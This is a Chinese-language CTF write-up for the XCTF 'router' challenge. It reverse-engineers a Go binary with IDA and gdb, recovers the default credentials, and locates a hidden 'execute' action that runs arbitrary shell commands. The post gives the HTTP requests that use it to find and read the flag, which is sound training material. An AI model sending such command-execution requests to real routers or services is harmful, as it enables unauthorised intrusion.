攻防世界-router

最新推荐文章于 2024-06-07 19:04:22 发布
最新推荐文章于 2024-06-07 19:04:22 发布
阅读量142 收藏
点赞数 2
文章标签: web安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sa1nZen/article/details/138761783
版权
一、题目
题目:Router
题目描述:XCTF
二、WriteUp
1. 信息搜集

file router
router: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=8e39573e0bf5a1874fe8c686aac112a50e81989d, stripped

./router 
[Info] using default config.
[Info] HTTP server has been started.
./router
[Info] Loading config file...OK!        #再次启动时
[Info] HTTP server has been started.

netstat -antp
tcp6  0  0 :::8080  :::*  LISTEN  23626/./router  

ls -altr
-rwxr-xr-x  1 fasd fasd 5752685 May  7 22:08 router
-rw-r--r--  1 fasd fasd      72 May  7 22:49 settings.conf
#settings.conf 为启动后产生的文件,cat后为加密内容

思路是先拿到username和password。
源程序只有一个二进制程序,那么username和password一定存在于二进制中。
可以对go二进制进行逆向和动态调试,看看输入的username和password是怎么处理的。

2. 逆向调试

(1) IDAGolangHelper+IDApro7.5进行静态分析

<0> IDApro7.5初次运行一定要执行绿化工具,配置目录下的python环境变量,否则会使用系统环境变量的python导致报错。还须观察ida的outputwindow pip安装相关的库文件。

<1>下载插件并修改
Gopclntab.py中
name = idc.get_strlit_contents(base + name_offset)后面添加
name = name.decode("utf-8")

<2> IDApro7.5 -> File -> Script File -> 选择go_entry.py -> determine go version -> 选择go1.6和rename fucntions ---OK

<3> shift+F12查找[Info] Loading config file...OK! 字符串
跟进找到它的交叉引用 来自sub_401160或者直接找函数名称main_Setting_Load
可以找到这个函数的地址为0000000000401160,基本的逻辑操作是读取了settings.conf并做了处理,猜测这里解密了,结果应该会在栈上进行保存。


(1) pwngdb进行动态分析
<4> 使用pwngdb动态调试
首先checksec router,发现PIE没有开,基址即0x400000
checksec router
Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

gdb router
b *0x401160
run
一直n不久后就可以看到
03:0018│     0xc82005bdc8 —▸ 0xc820303200 ◂— '{"Username":"router""Password":"router","Secret":"router","Backdoor":"","Session":{}}'

3. 后台再信息收集

检查功能点:
发现有两个可疑的功能点:
一个是Settings的import上传功能,但是这是goweb环境,难以利用。
另一个是Diagnostics的ping功能,回显与bash命令相似,猜测可能有未做命令类型限制。

使用burpsuite抓取ping命令的包

POST /414982cbfba0a78e38ae7aa9b6e3f22a HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 47
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=bmr9g7owko0x04pbnen36er34zpyerlx
Connection: close

action=ping&host=127.0.0.1&ipproto=ipv4&count=3

4. 逆向再分析

通过上述类似的方法寻找action字符串,找到main_Process函数,分析该函数

复制伪代码到vscode,收敛代码块,查看main_Process的大逻辑,截取关键核心函数

  if ( v26 != 4
    || (v158 = 4LL,
        runtime_eqstring(
          (unsigned int)v150,
          (_DWORD)a2,
          v22,
          (_DWORD)v25,
          v23,
          v24,
          (__int64)v25,
          4LL,
          (__int64)"ping",
          4,
          v119),
        v25 = (const __m128i *)v157,
        v26 = v158,
        !(_BYTE)v119) )
  {
    if ( v26 == 7 )     //判断是否为execute
    {
      v158 = 7LL;
      runtime_eqstring(     
        (unsigned int)v150,
        (_DWORD)a2,
        v22,
        (_DWORD)v25,
        v23,
        v24,
        (__int64)v25,
        7LL,
        (__int64)"execute",
        7,
        v119);
      v25 = (const __m128i *)v157;
      v26 = v158;
      if ( (_BYTE)v119 )
      {
        v115 = &unk_6A6DA0;
        v116 = *v125;
        v157 = "command";
        v158 = 7LL; //这里就是解析post的数据了 一般是以json的形式传输的
        v58 = runtime_mapaccess1_faststr( //runtime_mapaccess1_faststr 函数是 Go 语言运行时(runtime)中的一个函数,用于在 Map 类型中快速查找字符串键对应的值。该函数主要用于内部实现,用来优化在 Map 中进行字符串键的访问操作。
                (unsigned int)v150,
                (_DWORD)a2,
                v22,
                (unsigned int)"command",
                v23,
                v24,
                (__int64)&unk_6A6DA0,
                (__int64)v116,
                (char)"command",
                7,
                v119);
        if ( !v119 )
          dword_0 = v58;
        v61 = *(__int64 **)v119;
        v62 = *(_QWORD *)(v119 + 8);
        v199[0] = &unk_78F640;
        v199[1] = 2LL;
        v200[0] = 0LL;
        v195 = 2LL;
        v196 = 2LL;
        v63 = v199;
        v194 = v199;
        v162 = v62;
        v200[1] = v62;
        v161 = v61;
        if ( byte_9600B6 )
        {
          runtime_writebarrierptr(
            (unsigned int)v150,
            (_DWORD)a2,
            (_DWORD)v61,
            v62,
            v59,
            v60,
            (__int64)v200,
            (__int64)v61);
          v63 = v194;
        }
        else
        {
          v200[0] = v61;
        }
        os_exec_Command(        //执行命令
          (unsigned int)v150,
          (_DWORD)a2,
          (_DWORD)v61,
          v62,
          v59,
          v60,
          (__int64)"/bin/sh",
          7LL,
          (__int64)v63,
          v195,
          v196,
          (__int64)v120);
        os_exec__ptr_Cmd_Output(    //输出命令内容
          (unsigned int)v150,
          (_DWORD)a2,
          v64,
          v65,
          v66,
          v67,
          (__int64)v120,
          (__int64)v116,
          v117,
          v118,
          v119,
          (__int64)v120);
        a2 = v116;
        v179 = v116;
        v180 = v117;
        v181 = v118;
        v141 = v120;
        v140 = v119;
        if ( !v119 )
          goto LABEL_27;
        LABEL_30:
        v115 = v120;
        (*(void (__fastcall **)(__int64 *))(v119 + 32))(v150);
        LODWORD(v15) = (_DWORD)v116;
        v183 = (const char *)v116;
        v184 = v117;
        goto LABEL_28;
      }
    }
    v158 = v26;
    if ( v26 == 8 )
    {
      runtime_eqstring(
        (unsigned int)v150,
        (_DWORD)a2,
        v22,
        (_DWORD)v25,
        v23,
        v24,
        (__int64)v25,
        8LL,
        (__int64)"backdoor",
        8,
        v119);
      if ( (_BYTE)v119 )
      {
        main_RandomNumber((unsigned int)v150, (_DWORD)a2, v22, (_DWORD)v25, v23, v24, 48000LL, 62000LL, v117);
        v123 = v117;
        runtime_newproc((unsigned int)v150, (_DWORD)a2, v68, v69, v70, v71, 8, (char)&off_8225B8);
        v182 = 1LL;
        main_Int642Str((unsigned int)v150, (_DWORD)a2, v72, v73, v74, v75, v117, (__int64)v116, v117);
        v157 = (const char *)v116;
        v158 = v117;
        runtime_concatstring2(
          (unsigned int)v150,
          (_DWORD)a2,
          v76,
          (_DWORD)v157,
          v77,
          v78,
          0LL,
          (char)"0x0",
          3,
          (_DWORD)v157,
          v117,
          (__int64)v120,
          (__int64)v121);
        v183 = (const char *)v120;
        LODWORD(v15) = (_DWORD)v121;
        v184 = (__int64)v121;
        goto LABEL_28;
      }
    }
    goto LABEL_50;
  }

5. exp

通过分析上述函数,可构造命令执行。

POST /414982cbfba0a78e38ae7aa9b6e3f22a HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 26
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=bmr9g7owko0x04pbnen36er34zpyerlx
Connection: close

action=execute&command=pwd

通过以下命令找到,得到flag
action=execute&command=find%20.%20|grep%20flag
action=execute&commadn=cat%20/home/xctf/bin/flag
三、总结
1. IDAGolangHelper+ida7.5pro的使用方法
2. ida反编译的修改
3. vuln函数的寻找和利用
4. 反编译代码的解析
四、参考链接
https://www.freebuf.com/articles/web/239385.html
https://www.jianshu.com/p/9548a9c1830a
https://github.com/strazzere/golang_loader_assist/blob/master/golang_loader_assist.py
https://github.com/sibears/IDAGolangHelper
Sa1nZen
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界web
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
vue-taro-router:基本 Taro ,扩展成 vue-router 的使用体验
05-28
VueTaroRouter 基本 Taro ,扩展成 vue-router 的使用体验 Installation npm i vue-taro-router -S Usage // router.js import VueTaroRouter from "vue-taro-router"; const router = new VueTaroRouter(); // 添加拦截器 router .beforeEach((to, from, next) => { console.log(to); console.log(from); next(); }) .beforeEach((to, from, next) => { if (~to.path.indexOf("abc2")) { // 在拦截器里重定向 next({
react-router-cache-route:使用类似React-Router的缓存进行路由在Vue
05-11
缓存路由 英文| 使用缓存为Vue中的keep-alive类的react-router 。 如果只想要<KeepAlive> ,请尝试 React v15 + React-Router v4 + 问题 使用Route ,前进或后退时无法缓存组件,这会导致数据丢失和交互 原因与解决方案 Route不匹配时,组件将被卸载 阅读源代码之后Route ,我们发现使用children撑起一个功能,可以帮助控制呈现行为。 隐藏而不是删除将解决此问题。 安装 npm install react-router-cache-route --save # or yarn add react-router-cache-route 用法 用CacheRoute替换Route 用CacheSwitch替换Switch (因为Switch仅保留第一个匹配的状态路由,并卸载其他匹配状态的路由) impor
vue-router.js
12-30
vue路由vue-router.js文件下载
vuex-router-sync:轻松保持vue-router和vuex存储同步
02-06
Vuex路由器同步 同步Vue路由器当前的$route作为Vuex存储状态的一部分。 用法 # the latest version works only with vue-router >= 2.0 npm install vuex-router-sync # for usage with vue-router < 2.0: npm install vuex-router-sync@2 import { sync } from 'vuex-router-sync' import store from './store' // vuex store instance import rout
react-router:react-router 中文文档
04-29
React Router Declarative routing for 文档 Packages 这个存储库是我们使用管理的monorepo。 这意味着我们实际上从相同的代码库发布了几个包到npm,包括: Package Version Docs Description React Router的核心 react-router-dom React路由器的DOM绑定 react-router-native 用于React路由器的React Native绑定 react-router-redux Integration with React Router and Redux react-router-config 静态路由配置助手 About react--router的开发由React Training和许多的贡献者完成。 如果您有兴趣了解更多关于React能为您的公司做什么的事情,请联
攻防世界--shrine-(详细操作)做题笔记
qq_43715020的博客
06-14 895
攻防世界--shrine-笔(详细操作)做题笔记
攻防世界upload3
qq_28808571的博客
05-25 741
1.看到题目为文件上传,且题目描述中有源码泄露。将源码下载后发现为thinkphp5.1,于是直接百度发现thinkphp5.x的反序列化漏洞,但是由于源码中含有查找文件,一开始误以为是文件名注入. 但对源码的审计发现,对上传的文件检查还是比较严格的 还检查了文件头,但是可以使用GIF89a+一句话还是能够上传成功的,上传成功后可以在上传界面查看源码得到路径 结合源码发现这是 ...
攻防世界——Web高手区初试
qq_45746876的博客
03-14 228
攻防世界——Web高手区初试前言1.2.3.php_rce 前言 由于放假的原因,好久好久都没有更新了,整个人懒得就离谱,啥也不太想做,所以就停更了好久好久,虽然Kali网络渗透测试课程结束了,但是停课不停学,所以还是得让自己多学一点儿东西,多做一些总结叭 1. 2. 3.php_rce 拿到题目,先看看里面的东西,但是下面这几个链接点进去都是真实的场景,题目本身也没有提示,所以就先看看 ThinkPHP5 还有 V5.0版本是啥,百度发现ThinkPHP框架的V5.0版本是有远程代码执行漏洞的,于是找到
史上最详细系列--攻防世界web(高手进阶区1-4)
weixin_43911311的博客
03-31 2000
1.Baby web 首先看题目描述 是不是直接给了提示呢,答案是index.php 所以只需要打开index.php界面就能得到结果 当你输入index.php的时候,会自动跳转两次,所以最后还是1.php界面 此时需要F12,打开network 再次输入index.php,会抓取到以下结果 所以结果就出来了flag{very_baby_web} 2.Training-W...
《网络攻防技术》黑客与工具
WGH100817的博客
03-08 1114
一、黑客信息 龚广 科普一个呆萌的黑客,被称为移动安全领域的“赏金猎人”,今年1月22日,谷歌官方发文向他致谢,并颁发了总额为112500美金的奖金,这是安卓漏洞奖励计划史上最高金额的奖金。恩,人家提交了两个漏洞,就拿了70多万RMB。这人专门跟谷歌找茬,经常找找系统漏洞,破破手机什么的,反正看上去轻轻松松就拿到各种奖金了。哦,还有一点不得不提,谷歌对于安卓漏洞奖励计划的奖金本来没有很高...
攻防世界web解题[进阶](一)
weixin_46703850的博客
03-04 676
攻防世界web解题[进阶](一)
网络靶场攻防综合实验
weixin_46605806的博客
12-20 5786
目录一,靶场环境搭建1.1,网络拓扑结构图1.2,搭建简易的网络攻防实验靶场环境,包括:1.3,网络靶场攻击渗透测试,包括:1.4,网络靶场攻击检测二,靶场的搭建与攻击渗透测试2.1,Honeyd2.1.1,honeyd概述2.1.2,honeyd所依赖的函数库2.1.3,搭建honeyd2.1.4,编写honeyd的配置文件2.1.5,启动honeyd2.1.6,检查honeyd搭建情况2.2,具有“永恒之黑”CVE-2020-0796漏洞的虚拟主机2.2.1,漏洞概述2.2.2,复现环境2.2.3,漏洞
网络攻防实战演练(国网山东泰安学习)
质量不太好的博客
07-20 685
网络攻防实战演练(国网山东泰安学习)
路由器漏洞靶场 The Damn Vulnerable Router Firmware Project 的学习(持续更新)
qq_41071646的博客
08-06 563
看wiki 感觉看的也还行了 打算最近把 攻防世界的题 再看看 然后去肝一下buuctf上面的题目 然后 发现了一个 这个 路由器漏洞靶场 里面有源代码 还有编译好的 程序 然后 里面一共有三个 这里面也有三个 这里 从名字也能看出来利用的漏洞种类 这个项目的地址, https://github.com/praetorian-inc/DVRF 这里面还有源...
【网络安全的神秘世界】docker搭建pikachu靶场
weixin_54750312的博客
05-31 550
再访问80端口,因为默认端口就是80,所以80可省略。可以通过下面命令进入pikachu网站根目录。虽然是404,但实际已经启动好了。点击红色部分,进行安装/初始化。复制命令后,去kali安装。访问本地地址8080端口。
基于拓扑漏洞分析的网络安全态势感知模型
最新发布
attack2001的专栏
06-07 572
漏洞态势分析是指通过获取网络系统中的漏洞信息、拓扑信息、攻击信息等,分析网络资产可能遭受的安全威胁以及预测攻击者利用漏洞可能发动的攻击,构建拓扑漏洞图,展示网络中可能存在的薄弱环节,以此来评估网络安全状态。在网络安全形势日益恶化的今天,如何快速有效地获取网络系统的安全状况、提高网络安全应对水平、增大网络安全的预警时间,成为网络空间安全领域研究的重要问题。网络漏洞态势感知研究存在的问题是缺乏有效的网络漏洞势数据采集和要素提取方法,使得网络资产漏洞态势的理解和分析计算难以进行。
自学黑客(网络安全
xv7676的博客
06-07 592
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(补充)
m0_62207482的博客
06-07 311
拒绝服务攻击原理简单,实施容易,但是却难以防范,特别是与Botnet网络结合后,其攻击能力大大提高 SYN Cookie是对TCP服务器端的三次握手协议做一些修改,专门用来防范SYN Flood攻击的一种手段 不是任何利用脚本插入实现攻击的漏洞都被称为XSS,因为还有另一种攻击方式:Injection(脚本注入)。。跨站脚本攻击和脚本注入攻击的区别在于脚本注入攻击会把插入的脚本保存在被修改的远程Web页面里,跨站脚本是临时的,执行后就消失了 时间轮询技术(也可称为“外挂轮询技术”)。时间轮询技术是
react-router-cache-router
09-06
react-router-cache-router是一个基于React Router的扩展库,用于缓存路由组件。在使用React Router时,每次切换路由都会重新渲染组件,这在某些场景下会导致性能问题。而react-router-cache-router提供了一种缓存...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值